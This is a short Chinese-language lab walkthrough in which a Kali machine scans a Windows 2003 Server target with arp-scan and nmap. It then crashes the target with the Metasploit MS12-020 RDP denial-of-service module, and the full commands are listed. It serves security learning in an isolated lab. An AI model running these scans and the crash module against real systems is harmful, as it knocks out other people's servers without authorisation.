攻击机:KALI
靶机:win2003server
网络环境:攻击机与靶机同在NAT模式下
过程:
在同一网段可以用这个arp扫描命令快速扫描出目标IP
arp-scan -l
KALI进行Nmap扫描win2003server端口服务以及开放情况
nmap -sV 192.168.133.130
nmap -Pn 192.168.133.130
发现win2003server上已经开启了远程桌面服务,随后进行下一步
kali打开metasploit,搜索漏洞模块
search ms12-020
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
info #查看漏洞信息
set rhost 192.168.133.130
run
run之后进发现靶机出现了蓝屏,攻击结束